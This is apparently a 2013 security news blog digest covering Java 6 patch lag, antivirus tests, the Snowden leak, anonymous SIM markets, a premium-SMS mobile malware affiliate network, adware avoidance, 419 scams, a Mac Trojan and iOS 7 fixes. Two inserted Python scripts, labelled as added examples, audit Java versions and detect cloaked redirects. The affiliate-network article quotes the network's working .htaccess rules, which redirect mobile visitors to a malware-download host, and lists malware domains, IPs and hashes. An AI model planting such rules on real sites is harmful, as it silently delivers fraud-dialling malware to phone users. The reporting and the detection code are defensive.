Thursday 19 September 2013

Lagging Updates Compound Java Risks

Most Windows-based devices are running Java 6. Oracle is no longer releasing patches for this version of the software, which makes machines running it vulnerable to security risks.

Protecting popular software like Java against security vulnerabilities requires three steps. First, exploits must be discovered. Second, the vendor needs to develop effective patches. Third, end users or administrators need to apply the patches to client machines.
The longer it takes for this cycle to play out, the more exposed and vulnerable it leaves users. In the case of Java, the cycle is taking too long.
That is the finding in a recent report published by Websense Security Labs, which found that over 80 percent of enterprise browsers have Java clients enabled, but only 19 percent of Windows-based machines are running the latest version of Java 7. Most are running Java 6, which is no longer being patched and is vulnerable to significant exploits.

Zero-day Risks

Zero-day exploits are among the most dangerous. When a malicious attacker discovers and leverages a security flaw before it has become known to the software developer, this zero-day attack can impact everyone using the software. Users remain vulnerable until a patch is developed, released and applied --- meaning that a zero-day exploit can remain dangerous for a length of time that can be counted in days, years or even forever.

For example, Microsoft recently warned that users who continue using Windows XP beyond April 8, 2014 – the OS’ end-of-support deadline – will be vulnerable to "permanent" zero-day exploits. After that date, Windows XP will never receive security patches even for newly discovered exploits.
Likewise, Java 6 was "retired" by vendor Oracle in February of this year. Its last public patch was released in April. Yet, zero-day vulnerabilities like CVE-2013-2463 and CVE-2013-2473 are out in the wild. Which means exactly what?

Crime Kits and Ransomware

They say that crime doesn’t pay, but unfortunately in the world of online malware, it actually does. Or, at least, it can. "Kits," which can be purchased or rented by aspiring evildoers and provide a user-friendly interface to launching attacks, are the latest evolution in malware.
A crime kit such as Neutrino not only gives an attacker point-and-click access to finding targets and deploying attacks, it even lets them track their success across infected machines. Attackers can access a variety of attack tools from remote screen viewers to keyloggers.
Increasingly attackers are using crime kits to install so-called "ransomware" such as Reveton. Ransomware is a type of malware which attempts to extort payment from the victim. For example, the Reveton malware claims to be a product of law enforcement accusing the target of having broken the law and requiring them to pay a “fine” to restore access to their machine.
Kits like Neutrino are regularly updated with zero-day exploits to enhance their ability to compromise targets. By definition, these exploits are available to attackers before they are patched (or possibly even known about) by vendors. Even when patches are released, they are of no use until they are actually applied.
As reported by Websense, some 80 percent of enterprise Java requests are currently vulnerable to a Neutrino-launched attack.

Double-sided Defenses

Lowering these numbers, and thus improving enterprise security, is a double-sided coin for which both sides need improvement.
For IT organizations, it is easy to say "just install patches more quickly." But there are real-world challenges to consider. According to Alex Watson, director of security research at Websense, "Patch management can be a complicated and time-consuming process for organizations today. Many IT security teams lack the resources necessary to update application versions in real time."
Besides the sheer resource problem, said Watson, "new patches must be carefully tested for app compatibility." And, he added, "A single update and rush to patch could have a detrimental impact on business-critical applications."
In other words, patches can create unwanted side effects.
Watson suggests that one way for organizations to improve their ability to manage Java updates is to cull workstations that don’t strictly need Java, or a particular version of it. For example, if there are business critical applications that require the vulnerable Java 6 client, be sure that only those machines which need to run this application still possess Java 6. This at least reduces the potential attack surface area.
"Employees who do not require Java for their daily operations can either switch it off entirely or update to the most recent version," he said.
Better yet, Watson suggests organizations should pressure third-party vendors to maintain their applications to be compatible with the current state of Java. This would further reduce the need to run outdated versions of Java even on select machines.
On the vendor side of the coin, there is more Oracle can do to address the problem. First and foremost is to identify zero-day exploits more quickly and continue to reduce the vulnerable window before a patch becomes available.
Deploying the updates themselves is its own challenge. As described by Watson, "Java works across an astounding number of platforms. When Oracle rolls out an update, they are doing so across multiple operating system versions making the processes complex."
To that end, the new JDK 7u40 gives administrators control over which version of Java is used by which applications, which again helps reduce the aperture of exposure.
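The reduce-exposure policy described above (remove Java where it is not needed, upgrade everything else to the current release, and keep Java 6 only on the few hosts whose business application requires it) can be audited automatically. The following Python script is an added example, not code from the article or from Websense; it parses the first line of `java -version` output in the 1.x version scheme of the time (for example `java version "1.7.0_40"`) and sorts hosts into remove / upgrade / exempt / ok buckets. The host names, version strings and exemption list are constructed sample data.

```python
"""Audit Java installs against a reduce-exposure policy.

Added example (not from the original article). Parses the version line that
`java -version` prints, e.g.  java version "1.6.0_45", and classifies hosts:
  remove  - Java installed but no business application needs it
  exempt  - host is allowed to keep Java 6 for a legacy application
  upgrade - Java needed but older than the current release
  ok      - Java needed and current
  none    - Java not installed
All host names, versions and policy sets below are constructed.
"""
import re

# Matches the 1.x scheme used by Java 6/7: "1.<major>.0_<update>"; the
# update part is optional because early builds print e.g. "1.7.0".
VERSION_RE = re.compile(r'java version "1\.(\d+)\.\d+(?:_(\d+))?"')
CURRENT = (7, 40)   # JDK 7u40, the release named in the article


def parse_java_version(output):
    """Return (major, update) from `java -version` output, or None if absent."""
    m = VERSION_RE.search(output)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2) or 0)


def audit(hosts, needs_java, java6_exempt, current=CURRENT):
    """Classify each host.

    hosts        : {hostname: raw `java -version` output}
    needs_java   : hosts where some business application requires Java
    java6_exempt : hosts allowed to keep Java 6 for a legacy application
    """
    report = {"remove": [], "upgrade": [], "exempt": [], "ok": [], "none": []}
    for host, out in sorted(hosts.items()):
        ver = parse_java_version(out)
        if ver is None:
            report["none"].append(host)
        elif host not in needs_java:
            report["remove"].append(host)       # installed, not required
        elif host in java6_exempt and ver[0] == 6:
            report["exempt"].append(host)       # legacy app: keep 6 here only
        elif ver < current:
            report["upgrade"].append(host)      # behind current, incl. all Java 6
        else:
            report["ok"].append(host)
    return report


# Constructed sample inventory: output captured from `java -version` per host.
SAMPLE_HOSTS = {
    "ws-001": 'java version "1.6.0_45"\nJava(TM) SE Runtime Environment (build 1.6.0_45-b06)',
    "ws-002": 'java version "1.7.0_25"\nJava(TM) SE Runtime Environment (build 1.7.0_25-b15)',
    "ws-003": 'java version "1.7.0_40"\nJava(TM) SE Runtime Environment (build 1.7.0_40-b43)',
    "ws-004": "bash: java: command not found",
    "erp-01": 'java version "1.6.0_45"\nJava(TM) SE Runtime Environment (build 1.6.0_45-b06)',
}
SAMPLE_NEEDS_JAVA = {"ws-002", "ws-003", "erp-01"}   # constructed policy
SAMPLE_JAVA6_EXEMPT = {"erp-01"}                      # constructed policy


def sample_report():
    """Run the audit over the constructed inventory."""
    return audit(SAMPLE_HOSTS, SAMPLE_NEEDS_JAVA, SAMPLE_JAVA6_EXEMPT)


if __name__ == "__main__":
    for bucket, names in sample_report().items():
        print(f"{bucket:8s} {', '.join(names) or '-'}")
```

The exemption check runs before the version check on purpose: a host on the Java 6 exemption list is only exempt while it actually runs Java 6, so an exempt host that has been moved to an outdated Java 7 still shows up as needing an upgrade.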

Set It and Don't Forget It

Java exploits are not going to disappear anytime soon. For the enterprise, the best defense comes down to reducing Java exposure and streamlining the update testing and deployment process.
Remember that by the time Oracle has developed a patch, the zero-day exploit has been in the wild for some time. Any additional time taken to deploy the patch across the enterprise is essentially a bonus for attackers.

Norton, Kaspersky, and Bitdefender Rule New Antivirus Test

Researchers at German lab AV-Test keep twenty-odd antivirus products under observation constantly, collating and reporting their results every couple months. They cycle between testing under Windows XP, Windows 7, and Windows 8, sometimes using 64-bit editions. The latest results, released today, relate to testing under 64-bit Windows 7. Some products scored much better than when tested under the 32-bit operating system; others lost points galore.
Three-Part Score
AV-Test assigns each product up to six points in three different areas: Protection, Performance, and Usability. To test Protection, they gather brand-new malware samples daily and note whether each antivirus identifies and blocks them, either by detecting the file's signature or by recognizing its malicious behavior. A detection-rate test using common malware also feeds into the Protection score.
The Performance rating is straightforward. The less impact a product has on system performance, the higher its score. Researchers time a number of common user activities with and without the antivirus active to calculate that impact. The activities include "visiting websites, downloading software, installing and running programs and copying data."
Usability doesn't refer to the product's user interface, but rather to possible problems antivirus protection might cause. Researchers visit hundreds of known safe websites and downgrade any product that erroneously blocks access to a site or warns that it might be dangerous. A product that identifies a valid program as malicious will likewise lose points, as will a product that displays erroneous warnings about a legitimate program.
Certification
In order to pass AV-Test's certification, a product needs a total score of 10 points or more, with at least one point in each of the three categories. All tested products did manage certification, though AhnLab and Norman squeaked by with a bare 10 points.
Because Windows itself includes antivirus protection, AV-Test doesn't list Microsoft Security Essentials as one of the tested programs. Rather, it's considered a baseline. A product that can't beat MSE is doing pretty poorly. With 9.5 points, MSE wouldn't have received certification.
Climbers and Sinkers
The test before this one was also conducted under Windows 7, but it was the 32-bit version. A drop in score between the two tests might identify a product whose 64-bit edition needs work. Norman and Kingsoft in particular lost fully 2.5 points between the 32-bit test and the 64-bit test.
Norton's designers don't approve of static malware-identification tests, and portions of the AV-Test suite do include static detection. I don't imagine they'll complain about this round of testing, though. Norton gained 2.0 points over the previous test, reaching an impressive 17 of 18 possible points. Kaspersky also took 17 points, while Bitdefender beat all the rest with 17.5 points.
Just like crash-testing for cars, independent antivirus testing lets you see how a product performs in a dangerous situation without having to enter that situation yourself.

NSA's chief: Snowden took documents from internal website

Former security contractor Edward Snowden was able to obtain secret documents revealing a massive U.S. spying effort from the National Security Agency's internal website, U.S. officials said according to a report on Wednesday.
The classified documents leaked by Snowden were posted internally, and Snowden's job allowed him to single-handedly make digital copies without his supervisors' knowledge, government officials told National Public Radio.
They did not tell NPR how Snowden took copied files out of the office, citing an ongoing investigation.
"We have an extremely good idea of exactly what data he got access to and how exactly he got access to it," NSA's chief technology officer, Lonny Anderson, told NPR.
Anderson said the agency has taken steps to limit employees' options for storing data since the NSA surveillance programs were revealed.
"One thing we have done post-media leaks is lock those down hard, so those are [now] all in two-person control areas," he told NPR's "Morning Edition" program.
Snowden disclosed secret NSA programs involving the collection of telephone and email data to media outlets, including The Guardian and The Washington Post, which began publishing details in June.
He is wanted on U.S. espionage charges and is living in temporary asylum in Russia.
The NSA disclosures have raised questions about U.S. surveillance efforts and privacy as well as private contractors' clearance procedures and access to sensitive data.
But changes to data-sharing could also have national security implications given the push to share more intelligence among agencies after the September 11, 2001, attacks. Information sharing also arose as an issue in the Boston marathon bombing in April.
Anderson said other changes include limiting access to sensitive documents by "tagging" them with identifiers that will also allow supervisors to see who is viewing what data and what those individuals do with it.
The NSA's internal website still exists but it would not be possible for anyone now to make such copies without risk of detection, he added.

Cybercriminals offer anonymous mobile numbers for ‘SMS activation’, video tape the destruction of the SIM card on request

For years, cybercriminals have been abusing a rather popular practice that ties an account to a personal identifier, namely the activation of an online account through SMS. The service relies on the basic logic that a potential user would not abuse its ToS (Terms of Service) for fraudulent or malicious purposes. Now that it has associated a mobile number with the account, the service continues to ignore the fact that SIM cards can be obtained with fake IDs, which increases the probability of direct fraudulent or malicious abuse of the service.
What are cybercriminals up to in terms of anonymous SIM cards these days? Differentiating their UVP (unique value proposition) by offering what they refer to as a "VIP service" with a "personal approach" for each new client. In this post, I'll discuss a newly launched service offering anonymous SIM cards to be used for the activation of various services requiring SMS-based activation, and emphasize its UVP.

Sample screenshots of the inventory of anonymous SIM cards offered for sale:
Next to the inventory of cybercrime-friendly, non-attributable SIM cards, the cybercriminal behind this underground market proposition is also attempting to add value to it: he not only offers to store the SIM cards in a safe box, but also to destroy a SIM card on request, with video proof of the actual process.
Sample screenshot of video proof showing the destruction of an already used SIM card, courtesy of the service:
The service also charges a premium price for sending and receiving SMS messages, due to these value-added features.
The existence and proliferation of such services, built on false identities, directly contributes to the rise of fraudulent and malicious schemes launched on behalf of their users. Once a pseudo-legitimate identification has taken place on a popular Web site, a fraudster is in a perfect position not just to abuse its trusted infrastructure as a foundation for launching related attacks, but also to directly target a particular Web service's internal users through the trusted mechanisms it offers.
We’ll continue monitoring this underground market segment, and post updates as soon as new services offering anonymous SIM cards emerge.

Affiliate network for mobile malware impersonates Google Play, tricks users into installing premium-rate SMS sending rogue apps

Affiliate networks are an inseparable part of the cybercrime ecosystem. Largely based on their win-win revenue sharing model, throughout the years, they’ve successfully established themselves as a crucial part of the cybercrime growth model, further ensuring that a cybercriminal will indeed receive a financial incentive for his fraudulent/malicious activities online.
From pharmaceutical affiliate networks, iPhone selling affiliate networks, to affiliate networks for pirated music and OEM (Original Equipment Manufacturer) software, cybercriminals continue to professionally monetize each and every aspect of the underground marketplace, on their way to harness the experience, know-how and traffic acquisitions capabilities of fellow cybercriminals.
In this post, I’ll take a peek inside a cybercrime-friendly affiliate network for premium-rate SMS based mobile malware, list its associated numbers currently in use, provide MD5s of variants known to have been pushed by it, and discuss its business model.

Sample screenshots of the administration panel for a participant in the affiliate network for mobile malware:
Worth emphasizing, next to the fact that anyone can join the affiliate network, is that the premium-rate SMS-sending mobile malware supports multiple operating systems: it can expose users to .APK, .SIS and .JAR variants of the same mobile malware. The social engineering vectors of choice for the cybercriminals behind the affiliate network are as follows:
  • Fake Google Play mimicking the mobile version of the marketplace
  • Fake Adult themed videos
  • Fake Mobile Antivirus software
  • Two versions of a Fake Browser Security Update
Let's discuss the "agreement" (ingenious, from a scammer's perspective) that users who want access to the bogus/fraudulent content automatically accept. First of all, the web sites participating in the affiliate network "assumes no responsibility for any direct or consequential loss arising from the use of the application , including loss of profits and losses", and that's just for starters. Whenever a socially engineered user attempts to install the rogue applications, the initial SMS he/she sends automatically results in a subscription to the service, with the rogue applications sending premium-rate SMS messages in the background.
Known mobile malware MD5s pushed by the affiliate network:
MD5: 58668c269215e6e8a781e8e7bac1b4c3 – detected by 24 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Java:SMSreg-AW [PUP]
MD5: c12d148689cfbb80b271036c260b1d91 – detected by 27 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Trojan.Java.Smssend.AE
MD5: ead1a96f2a240987027e7935d3dfaef6 – detected by 24 out of 46 antivirus scanners as Trojan:Android/Fakeinst.T; Android:FakeInst-BH [Trj]
MD5: 306fe878ac61615c0571d34b3de733a6 – detected by 26 out of 45 antivirus scanners as Trojan.Java.Smssend.AE; HEUR:Trojan-SMS.J2ME.Agent.gen
MD5: 7fb7e22dcc91b24498f1c14e5d41a21d – detected by 26 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Trojan.Java.Smssend.AE
Premium-rate numbers used in the campaigns:
3150; 3170; 3200; 3190; 8055; 8155; 3352; 3353; 1350; 7122; 4448; 9990; 3150; 3190; 3006; 3170; 9293; 9394; 5060; 3602; 1897; 4161; 4446; 4449; 4448; 1302; 82300
.htaccess modification suggestion to automatically serve the mobile malware to the visitor of the Web site:
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ hxxp://browserupdate.mobi/mf/?stream=&type=apk [L,R=]
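The snippet above has a recognisable shape that a web-site owner or incident responder can hunt for in their own `.htaccess` files: a chain of `RewriteCond` lines that test `HTTP_USER_AGENT` or `HTTP_ACCEPT` for mobile clients, ending in a `RewriteRule` that sends the visitor to a host the site does not own. The following Python script is an added example, not code from the original post or from the affiliate network; it groups each `RewriteRule` with the conditions preceding it and flags user-agent-conditioned redirects to foreign hosts. The sample `.htaccess` it scans is constructed, and the target host in it is a placeholder (`mobile-update.example.invalid`), not one of the domains listed in the post.

```python
"""Flag user-agent-cloaked redirects to foreign hosts in Apache rewrite rules.

Added example (not from the original post). Scans .htaccess text for
RewriteCond chains that test HTTP_USER_AGENT / HTTP_ACCEPT and end in a
RewriteRule whose target is an absolute URL on a host not in the site's
own host list. The SAMPLE_HTACCESS below is constructed; its hostnames are
placeholders.
"""
import re
from urllib.parse import urlsplit

# RewriteCond <TestString> <CondPattern> [flags]   (flags are optional)
COND_RE = re.compile(r'^\s*RewriteCond\s+(\S+)\s+(.+?)(?:\s+\[([^\]]*)\])?\s*$', re.I)
# RewriteRule <Pattern> <Substitution> [flags]
RULE_RE = re.compile(r'^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$', re.I)
# Server variables whose value is controlled by the visiting client
CLIENT_VARS = {"%{HTTP_USER_AGENT}", "%{HTTP_ACCEPT}"}


def parse_rewrite_blocks(text):
    """Group every RewriteRule with the RewriteCond lines that precede it."""
    blocks, conds = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = COND_RE.match(line)
        if m:
            conds.append({"var": m.group(1),
                          "pattern": m.group(2).strip('"\''),
                          "flags": m.group(3) or ""})
            continue
        m = RULE_RE.match(line)
        if m:
            blocks.append({"conds": conds, "pattern": m.group(1),
                           "target": m.group(2), "flags": m.group(3) or ""})
            conds = []           # conditions only apply to the next rule
    return blocks


def find_cloaked_redirects(text, own_hosts):
    """Return rules that redirect user-agent-selected visitors off-site."""
    findings = []
    for block in parse_rewrite_blocks(text):
        client_conds = [c for c in block["conds"] if c["var"].upper() in CLIENT_VARS]
        if not client_conds:
            continue             # not conditioned on the client's identity
        # Reports often defang URLs as hxxp://; undo that before parsing.
        target = block["target"].replace("hxxp", "http", 1)
        parts = urlsplit(target)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue             # relative rewrite, stays on this server
        host = parts.hostname.lower()
        if host in own_hosts:
            continue             # legitimate mobile site on our own host
        findings.append({"host": host, "target": block["target"],
                         "client_conditions": len(client_conds),
                         "flags": block["flags"]})
    return findings


# Constructed sample: two legitimate rules and one with the cloaking shape.
SAMPLE_HTACCESS = """\
RewriteEngine on
# Legitimate: send phones to the site's own mobile host
RewriteCond %{HTTP_USER_AGENT} "android|iphone|mobile" [NC]
RewriteRule ^(.*)$ https://m.example.com/$1 [L,R=302]
# Legitimate: force HTTPS, no client test at all
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.example.com/$1 [L,R=301]
# Suspicious: mobile clients only, target is a foreign host (placeholder)
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|mobile|android" [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile-update.example.invalid/mf/?stream=&type=apk [L,R=]
"""
SAMPLE_OWN_HOSTS = {"www.example.com", "m.example.com"}


def sample_findings():
    """Scan the constructed sample with the constructed own-host list."""
    return find_cloaked_redirects(SAMPLE_HTACCESS, SAMPLE_OWN_HOSTS)


if __name__ == "__main__":
    for f in sample_findings():
        print(f"off-site redirect to {f['host']} gated by "
              f"{f['client_conditions']} client condition(s): {f['target']}")
```

The own-host list is what keeps a genuine "send phones to m.example.com" rule out of the findings; without it, any mobile redirect would fire. Run it over every `.htaccess` and virtual-host config on a web server after a compromise, and add the server's canonical hostnames to `own_hosts`.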
Known mobile malware serving domains part of the core infrastructure of the affiliate network:
hxxp://iosoffer.mobi/cpa/&stream= – 91.223.77.198
hxxp://mid2psys.mobi/js.php?stream= – 91.223.77.198
hxxp://browserupdate.mobi/mf/?stream= – 91.213.175.66
hxxp://playsmarket.mobi/?stream= – 91.213.175.66
hxxp://adtivirusmobile.mobi/?stream= – 91.213.175.66
hxxp://wapadults.mobi/?stream=3963 – 91.213.175.66
Responding to 91.223.77.198 are also the following domains participating in the affiliate network’s infrastructure:
allnokia88.ru
allnokia99.ru
iosoffer.mobi
mid2psys.mobi
mob-in-portal.mobi
serv-nokia.ru
Related mobile malware domains known to have participated in campaigns courtesy of the same affiliate network:
3xplay.ru
adtivirusmobile.mobi
advdemo.ru
allnokia88.ru
allnokia99.ru
allwapup.ru
android4plays.ru
awtoforum.ru
browserupdate.mobi
burniyson.org
funkit-fot-you.ru
google-video.ru
htavefg.ru
java-praktika.ru
kopiivipshop.ru
lwupdate.ru
market-mobile.tk
mid2psys.mobi
mob-in-portal.mobi
mobi-fotoppz.ru
mobpornn.biz
my-hut.ru
news-top.info
newsmobi.info
opera-mini-software.ru
opera-seven.ru
operablock-in.mobi
operamini-7-5.ru
operamobi-in.mobi
operanew-in.mobi
operanew-in.ru
operaupdate-in.mobi
operaupdate-in.ru
playsmarket.mobi
poppnuha.ru
rap-schokk.ru
scaner.biz
serv-nokia.ru
shwap.mobi
soft-ipad.tk
soft-iphone.tk
sotkina.pp.ua
tutnauka.ru
update-brows.tk
vandroide.ru
wapadults.mobi
xvideos-porno.mobi
xxx-tubesex.ru
xxx4iphone.ru
xxx4mobile.ru
zonanauki.ru
We expect to continue observing an increase in mobile malware pushed through affiliate networks, which empower underground market participants with managed infrastructure, systematically rotated undetected mobile malware samples, and the actual monetization vector to take advantage of in the first place.

How to avoid unwanted software

We’ve all seen it; maybe it’s on your own computer, or that of a friend, your spouse, child, or parent. Your home page has been changed to some search engine you’ve never heard of, there’s a new, annoying toolbar in your browser. Maybe you’re getting popup ads or have a rogue security product claiming you’re infected and asking you to buy the program to remove the infection. Even worse, you don’t know how it got there! Welcome to the world of Potentially Unwanted Applications (PUAs.) Chances are that these programs were inadvertently installed while installing software from sites that use “download managers” that add additional software to otherwise free downloads.
Many of these “download managers” and the additional applications they install use a Pay Per Install business model that is often used by unscrupulous individuals that use various techniques to trick you into clicking on their sites rather than the official download site for the software you’re attempting to download. These techniques include using advertisements on search engines and various Search Engine Optimization (SEO) techniques to get their sites to show up before the official downloads in search results. We’ve even seen fake image upload sites whose sole purpose is to direct you to a page that looks like an official download page for a program but uses one of these “download managers” instead.
So how do you avoid these “download managers?” It’s actually pretty simple. Whenever possible, download software from the software company’s official page (this is not always possible since some software is only available through third-party download sites.) As mentioned earlier, some of the most popular techniques to get you to install software using these “download managers” is through ads and SEO techniques on search engines, so we’ll show you how to locate the official download links in search results from Google, Bing, and Yahoo.
For this example we’ll search for the popular voice and video chat program Skype by searching for “download Skype.”
With Google it is rather easy to spot the official download link since the advertisements are clearly marked, and the first actual result is the official download link:
[Screenshot: Google search results for "download Skype"]
Let’s have a look at Bing next. Since both Skype and Bing are Microsoft products, the first two search results are for the official download links:
[Screenshot: Bing search results for "download Skype"]
For a better example of Bing results, let’s search for Adobe Reader by searching for “download adobe acrobat reader.” This one is also pretty easy to spot since the ads are clearly marked.
[Screenshot: Bing search results for "download adobe acrobat reader"]
Now let’s have a look at the results for “download Skype” on Yahoo. Once again, the ads are clearly marked and the first actual result is the official download link.
[Screenshot: Yahoo search results for "download Skype"]
Looking at these search results, you'll notice a few things in common: the top results are all ads, none of the ads point to the official download links, and the first actual link that is not an advertisement is the official download link. While this will not always be the case, it is common, and fortunately the three search engines we used in this example all do a very good job of identifying their advertisements. Does this mean that all ads are bad? Of course not! But when looking to download free software, the ads may not be your best choice. Also pay attention to the URLs: the official downloads are all on "skype.com" domains, while all the ads point to other domains.
Now you should have a better understanding of how some of those unwanted toolbars and search pages ended up on your computer, that clicking on the top result on a search page may not be the best way to go about downloading free software, and how to find the official download links for software on some of the most popular search engines. Pass this information onto others, and maybe you’ll save yourself a trip to a friend or family member’s house to remove an unwanted toolbar.

419 advance fee fraudsters abuse CNN’s ‘Email This’ Feature, spread Syrian Crisis themed scams

Opportunistic 419 advance fee scammers are currently using CNN.com's "Email This" feature to spamvertise Syrian Crisis themed emails, in an attempt to bypass anti-spam filters and ultimately trick users into interacting with these fraudulent emails. The emails are just the tip of the iceberg in an ongoing attempt by multiple cybercrime gangs, looking to take advantage of the geopolitical situation (an event-based social engineering attack) for fraudulent purposes, who continue spamming tens of thousands of emails impersonating internationally recognized agencies, on their way to socially engineering users into believing the legitimacy of these emails.

Sample screenshot of the spamvertised email:
This isn't the first time we've seen them abusing a legitimate Web site's "Email This" feature. Following the most recent abuse of Google Calendar, we also observed 419-ers abusing legitimate Web sites back in 2009 (Dilbert.com and NYTimes.com), and we believe we'll continue seeing this type of abuse, taking into consideration the fact that 419-ers are constantly seeking new and pragmatic ways to bypass anti-spam filters.
How to prevent falling victim to such type of attacks? Go through these tips.

Poison Apple? “Kissing” picture spreads Trojan to Mac users

A picture of a smooching couple actually delivers a kiss of death to Mac OS X users – it’s a new Mac Trojan which opens a backdoor on users’ machines. It’s the second piece of Mac malware detected in a week, and was picked up on VirusTotal, sent in by a user in Belarus.
Mac security experts Intego said in a blog post, “A new Mac Trojan has been discovered that creates a backdoor on an affected user’s machine. At the time of writing, the Command and Control (C&C) server is down and no longer sending commands to affected users. This appears to be a targeted attack, though the method of delivery is not yet known. So, while this has been affecting users in the wild, the overall threat level appears to be low.”
The Trojan attempts to download an image file of a logo for hacktivist group Syrian Electronic Army. It’s not clear whether the malware is the work of the group.
“At this time, we are unaware how it is sent to affected users,” Intego said. “The malware could likely be sent by email or placed on a website as part of a watering hole attack, for instance. Depending on how the file is received, the behavior of the file in OS X may be slightly different.”
Intego says that when installed, the Trojan attempts to conceal itself, and disguise itself as an ordinary image file, and gets to work.
"It then opens the JPEG image inside the Application bundle with the standard OS X application Preview, which fools the user into thinking that it was just an image file. The Trojan application installs a permanent backdoor that allows the attacker to send a variety of commands," Intego said.
In a detailed blog post exploring the myths around Mac malware, ESET Senior Researcher Stephen Cobb says, “Many people have repeated the statement that Macs can’t catch viruses. There may be a qualified sense in which that is true, but it obscures the wider reality that Macs can, and do, get hit with other forms of malicious software.”
Last week, Mac malware targeting Tibetan activists was shared on Virus Total. ESET reports on previous malware targeting Tibetan activists can be found here.
ESET Senior Research Fellow David Harley says, in a post on Mac Virus, "I suspect that Apple will slipstream detection for [the Tibet malware] into XProtect.plist sooner rather than later. In any case, its actual spread is almost certainly as light as you'd expect from targeted malware. It seems to have crossed the AV radar because of a sample sent to VirusTotal, not as a result of user reports."
Harley is to deliver a presentation on Mac malware at this year’s Virus Bulletin 2013 conference in Berlin, Germany, from 2-4 October.

Apple iOS 7 includes 41 security updates for iPhone and iPad

Apple has rolled out 41 key security updates in its latest iOS 7 mobile operating system, plugging holes that potentially left iPhone and iPad users open to attack.
Apple released the details of iOS 7's enhanced security features in a public post in the support section of its site. The updates address a number of the operating system's key services and code, including its certificate trust policy, data protection systems and Safari web browser.
Some of the updates address vulnerabilities that could theoretically have been used by hackers to mount a variety of attacks on iPhone users. These included arbitrary code execution, data theft and basic denial of service. A key theme in the update was increasing iOS app security systems. There is currently no evidence any of the fixed areas have been exploited by hackers.
App security has been a key feature of iOS since it was launched, with Apple opting to use a closed approach to its ecosystem, rigorously vetting apps before letting them onto its official store and locking the software to stop developers creating third-party stores. The tactic has proved successful and to date there have been no recorded mobile malware incidents on iOS.
The operating system's impressive track record led F-Secure security expert Mikko Hypponen to praise Apple for its robust security, listing the App Store as one of the security community's greatest achievements during a speech at Infosec earlier this year.
Despite the positive track record security researchers have demonstrated theoretical ways to bypass iOS security features. Most recently Georgia Institute of Technology researchers reported finding a way to sneak malware-laden applications onto the Apple app store at the Usenix Conference.
The flipside of the closed model is that Apple does not disclose any information about potential vulnerabilities until it has investigated and fixed them.
"For the protection of our customers, Apple does not disclose, discuss or confirm security issues until a full investigation has occurred and any necessary patches or releases are available," reads Apple's disclosure policy.
The tactic is different to many software and hardware companies, which take a more open policy of alerting users to vulnerabilities in their services and systems as soon as they can. Most recently Microsoft disclosed finding a vulnerability in its Internet Explorer web browser. The more open disclosure policy is designed to help businesses and general web users take adequate short-term defence measures while the company works on a more serious, permanent solution.
Apple released a security update for its OS X computer operating system alongside its iOS release. The vulnerability lay in its Xcode 5.0 system and affected OS X Mountain Lion v10.8.4 or later. The flaw meant an attacker with a privileged network position could potentially use it to intercept sensitive information, such as user credentials.

PRISM: Facebook founder Mark Zuckerberg warns NSA snooping will damage international business

Facebook chief executive and founder Mark Zuckerberg has warned that NSA PRISM snooping will have financial consequences for international businesses.
Speaking at an event hosted by The Atlantic magazine in Washington, Zuckerberg claimed that governments' use of technology companies such as Facebook to spy on citizens will lead to a loss of customer trust that will ultimately damage those companies' ability to operate internationally, Reuters reported.
During the event Zuckerberg mirrored widespread calls within the security community for governments to be open about what data their spying campaigns are gathering from companies.
"What I can tell from the data that I see at Facebook is that I think the more transparency and communication [from] the government about how they're requesting the data from us, the better everyone would feel about it," he said.
"From reading in the media, you couldn't get a sense whether the number of requests that the government makes is closer to 1,000 or closer to 100 million. I think the more transparency the government has, the better folks would feel."
Ex-Navy SEAL and Silent Circle chief executive Mike Janke made a similar claim in an interview with V3 last month, arguing that businesses, consumers and governments need to have an open conversation about what data government agencies such as the NSA and GCHQ can collect.
Zuckerberg's comments are the latest step in Facebook's ongoing battle to publicly disclose what data requests it received from the NSA. Facebook is currently petitioning the US government to let it release information showing what data was taken from its servers.
